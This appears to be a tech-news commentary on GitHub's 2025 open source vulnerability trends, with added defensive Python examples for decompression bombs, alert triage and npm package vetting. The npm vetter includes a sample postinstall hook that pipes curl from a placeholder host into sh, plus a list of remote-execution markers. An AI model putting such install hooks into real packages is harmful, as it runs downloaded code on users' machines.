2025 Open Source Vulnerability Trends

GitHub reviewed just 4,101 open source advisories in 2025, the fewest since 2021. But don't pop the champagne: newly reported vulnerabilities jumped 19%. The backlog shrank, not the risk.

Line chart showing decline in GitHub reviewed open source advisories from 2021-2025 with new vuln spike

Key Takeaways

  • Reviewed advisories hit 4-year low at 4,101, but new vulns up 19% YoY.
  • CWE shifts: Resource exhaustion and SSRF surged; untagged advisories fell 85%.
  • npm malware spiked 69%; prioritize EPSS + CVSS for real threats.

GitHub’s security dashboard blinks with a counter frozen at 4,101: reviewed advisories for 2025, lowest tally since 2021.

Open source vulnerability trends tell a tale of cleared decks, not cleaner code. GitHub's team, which curates the Advisory Database and assigns CVE IDs as a CNA, crunched the numbers. Fewer total reviews? Sure. But strip out the ancient backlog, and newly reported vulns spiked 19% year over year. GitHub is simply running dry on dusty, unreviewed relics, most of which got a quick glance and were dismissed as irrelevant to live packages anyway.

Fewer advisories reviewed doesn’t mean fewer vulnerabilities were reported. The drop is because GitHub reviewed far fewer older vulnerabilities. When you look only at newly reported vulnerabilities from our sources, GitHub actually reviewed 19% more advisories year over year.

That’s GitHub’s own words, straight from the analysts. Dependabot users: expect fewer alerts on zombie vulns haunting your deps.

Why Does the Advisory Drop Mask Real Risks?

Look. They're out of old fish to gut. New reports keep pouring in, steady as ever. An 'unreviewed' tag? Often just a polite 'nope, doesn't touch our ecosystems.' Spot one that does affect a package in a supported ecosystem? Ping GitHub and they'll review it.

The ecosystem split stays familiar, bar one outlier. Go modules? Overrepresented by 6%, thanks to a dedicated campaign to find Go advisories that earlier coverage had missed. JavaScript, Ruby and Python hold their usual spots. No seismic shift.

But CWE types? That's where it gets spicy. Cross-site scripting (CWE-79) reigns supreme: 672 advisories, unchanged. Path traversal (CWE-22) climbs to 214. Then the jumps: incorrect authorization (CWE-863) vaults nine spots to 169, mostly reclassifications away from the broader access-control CWEs that MITRE's mapping guidance now discourages.

Resource exhaustion duo—CWE-400 (154), CWE-770 (136)—plus unsafe deserialization (CWE-502, 134) and SSRF (CWE-918, 103) all surged. Why? Coordinated hunts, maybe. Or attackers loving those vectors.
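A worked illustration of the allocation-without-limits pattern behind CWE-770, added here and not taken from GitHub's post: a service that inflates client-supplied zlib data with no cap, beside the bounded version. The 'bomb' payload, the 1 MiB budget and the function names are constructed for the demo.

```python
"""Added example, not code from GitHub's post: a CWE-770 allocation-without-limits bug
beside its fix. Inflating client-supplied zlib data lets the client pick how much memory
the server allocates; the 'bomb' below is constructed inline for the demo."""
from __future__ import annotations

import zlib

# Constructed sample inputs (not captured from any real advisory):
# ~8 MiB of zeros compresses to a few KiB, a ratio of roughly 1000:1.
INFLATED_SIZE = 8 * 1024 * 1024
BOMB = zlib.compress(b"\x00" * INFLATED_SIZE, 9)
SMALL = zlib.compress(b'{"status":"ok"}')

# Assumed policy for the demo: one request may inflate to at most 1 MiB.
MAX_INFLATED_BYTES = 1024 * 1024


class PayloadTooLarge(ValueError):
    """Raised when inflated output would exceed the configured budget."""

    def __init__(self, produced: int, limit: int) -> None:
        super().__init__(f"inflated output exceeded {limit} bytes (stopped at {produced})")
        self.produced = produced
        self.limit = limit


def inflate_unbounded(payload: bytes) -> bytes:
    """Vulnerable (CWE-770): zlib.decompress allocates whatever the stream expands to."""
    return zlib.decompress(payload)


def inflate_bounded(payload: bytes, limit: int = MAX_INFLATED_BYTES) -> bytes:
    """Hardened: inflate through a decompressobj with max_length so the output buffer
    can never grow past limit + 1 bytes, however good the compression ratio is.

    decompressobj.decompress(data, max_length) returns at most max_length bytes and
    parks the unprocessed input in .unconsumed_tail, so the loop can stop the moment
    the budget is exceeded without having materialised the rest.
    """
    d = zlib.decompressobj()
    out = bytearray()
    data = payload
    while data:
        # Ask for one byte more than the remaining budget: if we get it, the
        # payload is over budget and we bail before allocating any further.
        out += d.decompress(data, limit - len(out) + 1)
        if len(out) > limit:
            raise PayloadTooLarge(len(out), limit)
        data = d.unconsumed_tail
    out += d.flush()
    if len(out) > limit:
        raise PayloadTooLarge(len(out), limit)
    return bytes(out)


def compression_ratio(payload: bytes) -> float:
    """Inflated size divided by wire size, using the unbounded path (demo only)."""
    return len(inflate_unbounded(payload)) / len(payload)


def check_payload(payload: bytes, limit: int = MAX_INFLATED_BYTES) -> tuple[bool, int]:
    """Return (accepted, bytes_produced): what a hardened request handler would do."""
    try:
        return True, len(inflate_bounded(payload, limit))
    except PayloadTooLarge as exc:
        return False, exc.produced


if __name__ == "__main__":
    print(f"bomb: {len(BOMB)} bytes on the wire, ratio {compression_ratio(BOMB):.0f}:1")
    print("small payload:", check_payload(SMALL))
    print("bomb payload: ", check_payload(BOMB))
```

The same shape applies to any client-controlled size: a declared array length, a multipart upload, a JSON document. The fix is never "trust the declared size"; it is a hard budget checked before the allocation happens, which is what the max_length loop does.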

Big win: CWE tagging sharpened up. Advisories sans tags plummeted 85%, from 452 to 65. CWE-20 (improper input validation) lingers at 154, but now paired with specifics—like the exact exhaustion trick. Actionable data for your triage.

Here’s my take, absent from GitHub’s spin: this mirrors the post-Log4Shell frenzy of 2022, when backlog-clearing masqueraded as progress. Back then, vulns exploded; today, we’re prepping for AI-fueled discovery engines that could double new reports by 2027. Don’t sleep—it’s not safer open source, just better bookkeeping.

Is Go Becoming Vulnerability Central?

Six percent overrepresented. Dedicated campaigns unearthed misses. Fair. But watch: Go's simplicity lures devs, and wherever the standard library stops, teams hand-roll their own parsers and auth code, and that is where the bugs land. Prediction? If npm malware keeps spiking (more below), Go could be the next ecosystem domino.

Prioritization? GitHub pushes CVSS for impact and EPSS for the probability that a vuln is exploited in the wild within the next 30 days. The charts show most vulns land at moderate-to-high CVSS. Low ones? Underreported: too meh for researchers to bother writing up.

Against CISA's Known Exploited Vulnerabilities (KEV) catalog, EPSS shines: it nails the likely hits. CVSS flags more criticals but drowns the signal in noise. Blend them. Dependabot's auto-triage rules let you filter alerts by CWE; do it.
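The blend described above, as an added example rather than anything from GitHub or FIRST: a small triage routine that orders alerts by KEV membership, then EPSS, then CVSS, with a CWE filter applied on top. The alerts, the 10% EPSS threshold and the DEMO-* advisory IDs are constructed for the demo and do not correspond to real advisories.

```python
"""Added example, not code from GitHub's post: ordering dependency alerts by EPSS, CVSS
and CISA KEV membership, with an optional CWE filter. The alerts are constructed for the
demo and the advisory IDs are placeholders, not real GHSA identifiers."""
from __future__ import annotations

from dataclasses import dataclass

# Assumed policy: a 30-day exploit probability of 10% or more means 'patch this sprint'.
# EPSS scores are probabilities in [0, 1]; pick the threshold for your own risk appetite.
EPSS_THRESHOLD = 0.10


@dataclass(frozen=True)
class Alert:
    package: str
    advisory: str   # placeholder ID for the demo, not a real advisory
    cwe: str
    cvss: float     # CVSS base score, 0-10
    epss: float     # EPSS probability of exploitation within 30 days, 0-1
    kev: bool       # appears in CISA's Known Exploited Vulnerabilities catalog


# Constructed alerts: a 'critical by CVSS but nobody exploits it' case next to a
# moderate-CVSS SSRF that is on KEV, plus the resource-exhaustion CWEs the post highlights.
SAMPLE_ALERTS = [
    Alert("demo-serializer", "DEMO-0001", "CWE-502", cvss=9.8, epss=0.004, kev=False),
    Alert("demo-http-client", "DEMO-0002", "CWE-400", cvss=7.5, epss=0.42, kev=False),
    Alert("demo-proxy", "DEMO-0003", "CWE-918", cvss=5.3, epss=0.91, kev=True),
    Alert("demo-template", "DEMO-0004", "CWE-79", cvss=6.1, epss=0.001, kev=False),
    Alert("demo-parser", "DEMO-0005", "CWE-770", cvss=7.5, epss=0.15, kev=False),
]


def tier(a: Alert) -> int:
    """0 = known exploited, 1 = likely exploited soon, 2 = critical impact, 3 = backlog."""
    if a.kev:
        return 0
    if a.epss >= EPSS_THRESHOLD:
        return 1
    if a.cvss >= 9.0:
        return 2
    return 3


def prioritize(alerts: list[Alert], cwe_filter: set[str] | None = None) -> list[Alert]:
    """Sort alerts by tier, then EPSS, then CVSS, optionally restricted to some CWEs
    (the same kind of CWE filter Dependabot's auto-triage rules expose)."""
    if cwe_filter is not None:
        alerts = [a for a in alerts if a.cwe in cwe_filter]
    return sorted(alerts, key=lambda a: (tier(a), -a.epss, -a.cvss))


def work_queue(alerts: list[Alert], cwe_filter: set[str] | None = None) -> list[str]:
    """Advisory IDs in the order a responder should work them."""
    return [a.advisory for a in prioritize(alerts, cwe_filter)]


if __name__ == "__main__":
    for a in prioritize(SAMPLE_ALERTS):
        print(f"tier {tier(a)}  {a.advisory}  {a.package:18} {a.cwe:8} "
              f"cvss={a.cvss:<4} epss={a.epss:.3f} kev={a.kev}")
    print("resource exhaustion only:", work_queue(SAMPLE_ALERTS, {"CWE-400", "CWE-770"}))
```

The KEV-first, EPSS-second ordering is what makes the 9.8 deserialization bug with a 0.4% exploit probability wait behind the 5.3 SSRF that is actually being exploited; a CVSS-only queue would invert that.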

npm malware? 69% surge. SHA1-Hulud campaigns and kin flooded the registry. Typosquatting, trojanized deps—classic. Open source’s free-for-all vibe bites back.

Market dynamic: by Gartner-style estimates, the OSS supply chain is a $10B risk pool by 2026. Firms like Sonatype thrive on scans; GitHub's alerts are table stakes. But maintainers? Overloaded. Vulns persist because fixes lag adoption.

Sharp position: GitHub’s ‘quality improvements’ in tagging? PR gloss. Real fix? Fund maintainers, not just curators. Else, 2026 repeats 2025—with fancier CWEs.

And npm? That 69%? Not a blip. Blockchain scams, crypto-miners disguised as utils. Devs run npm install blindly; attackers feast.
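A pre-install vet for the npm problems described in the two npm passages above (install hooks and typosquats), added here as an example rather than code from GitHub or npm: it parses a package.json, flags install-time lifecycle scripts, and compares the package and dependency names against a shortlist of popular packages using an edit distance that counts adjacent swaps as one edit. The manifests, the shortlist, the marker strings and the example.invalid URL are constructed for the demo.

```python
"""Added example, not code from GitHub's post: a pre-install vet of an npm package.json
that flags install-time lifecycle hooks and near-miss names against a shortlist of popular
packages. Both manifests and the shortlist are constructed for the demo."""
from __future__ import annotations

import json

# Constructed shortlist standing in for 'the top N npm packages by downloads'.
POPULAR_PACKAGES = ["lodash", "express", "react", "chalk", "axios", "minimist"]

# npm runs these hooks during `npm install`, so a script here executes on the
# developer's machine or CI runner before a single line of the package is imported.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Substrings that mean the hook reaches out to the network or evaluates code it fetched.
REMOTE_EXEC_MARKERS = ("curl ", "wget ", "| sh", "| bash", "node -e", "eval(")


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert/delete/substitute plus adjacent
    transposition, since typosquats are usually a dropped letter ('expres') or a
    swap ('lodahs') and plain Levenshtein would score the swap as 2."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def lookalikes(name: str, corpus: list[str] = POPULAR_PACKAGES, max_distance: int = 1) -> list[str]:
    """Popular names within max_distance edits of name, excluding an exact match."""
    return [p for p in corpus if p != name and osa_distance(name, p) <= max_distance]


def vet_manifest(manifest_json: str) -> list[str]:
    """Return human-readable findings; an empty list means nothing looked off."""
    m = json.loads(manifest_json)
    findings: list[str] = []
    name = m.get("name", "")
    scripts = m.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        note = f"install hook '{hook}' runs: {cmd}"
        if any(marker in cmd for marker in REMOTE_EXEC_MARKERS):
            note += " (fetches or evaluates remote code)"
        findings.append(note)
    for popular in lookalikes(name):
        findings.append(f"package name '{name}' is one edit away from '{popular}'")
    deps = {**(m.get("dependencies") or {}), **(m.get("devDependencies") or {})}
    for dep in deps:
        for popular in lookalikes(dep):
            findings.append(f"dependency '{dep}' is one edit away from '{popular}'")
    return findings


# Constructed manifests (not real packages): one typosquat with a postinstall dropper,
# one ordinary application manifest.
SUSPICIOUS_MANIFEST = json.dumps({
    "name": "lodahs",
    "version": "4.17.21",
    "scripts": {"postinstall": "curl -s https://example.invalid/s.sh | sh"},
    "dependencies": {"expres": "^4.18.0", "axios": "^1.6.0"},
})
CLEAN_MANIFEST = json.dumps({
    "name": "my-app",
    "version": "1.0.0",
    "scripts": {"test": "node --test"},
    "dependencies": {"lodash": "^4.17.21", "express": "^4.18.0"},
})

if __name__ == "__main__":
    for label, manifest in (("suspicious", SUSPICIOUS_MANIFEST), ("clean", CLEAN_MANIFEST)):
        print(label, "->", vet_manifest(manifest) or ["no findings"])
```

Point it at a manifest before the first install, swap the shortlist for a real top-N download list, and keep npm install --ignore-scripts on while any install-hook finding is open; a hook that pipes curl into sh has no business running on a build agent holding publish tokens.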

So, devs. Patch high-EPSS first. Ecosystems matter less than vectors now—exhaustion’s the silent killer.

What Should Devs Do About 2025 Trends?

Filter alerts. Use EPSS thresholds. Audit Go if you’re there. npm? Vet packages like your job depends on it—because it does.

Historical parallel: Heartbleed 2014. OSS woke up then. We’re due another wake-up; this data’s the alarm.


Frequently Asked Questions

What caused the drop in GitHub advisories for 2025?

Mostly clearing old, irrelevant vulns—new ones rose 19%.

Why is CWE-79 still king in open source vulns?

XSS everywhere; web apps gonna web.

How bad is npm malware in 2025?

69% jump from campaigns like SHA1-Hulud—scan ruthlessly.

Elena Vasquez
Written by

Senior editor and generalist covering the biggest stories with a sharp, skeptical eye.



Originally reported by GitHub Blog
